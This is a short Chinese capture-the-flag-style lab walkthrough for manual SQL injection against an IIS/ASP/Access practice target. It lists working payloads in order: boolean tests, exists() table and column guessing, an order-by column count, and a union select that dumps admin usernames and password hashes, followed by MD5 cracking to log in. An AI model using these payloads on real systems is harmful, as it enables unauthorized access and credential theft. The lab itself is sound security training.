背景介紹
安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境IIS+ASP+Access,Aspx代碼對客戶端提交的參數未做任何過濾。盡情的練習SQL手工注入吧。
實訓目標
1.掌握SQL注入原理;
2.瞭解手工注入的方法;
3.瞭解Access的數據結構;
4.瞭解字符串的MD5加解密;
解題方向
手工進行SQL注入測試,獲取管理密碼登錄。
1、判斷注入點:
分別用and 1=1和and 1=2測試,發現1=1的時候頁面沒有變化,1=2的時候頁面發生變化,說明存在數字型注入。
2、猜表名:
id=1 and exists(select * from admin) //頁面返回正常,說明存在admin表
3、猜列名:
id=1 and exists(select username from admin) //頁面返回正常,說明存在username列
id=1 and exists(select passwd from admin) //頁面返回正常,說明存在passwd列
4、判斷某個id對應的列數:
id=1 order by 4 //顯示正常
id=1 order by 5 //顯示不正常,說明數據庫字段是4
5、判斷某個id對應的列數:
id=1 union select 1,username,passwd,4 from admin
最後解密MD5登錄後臺獲取key值。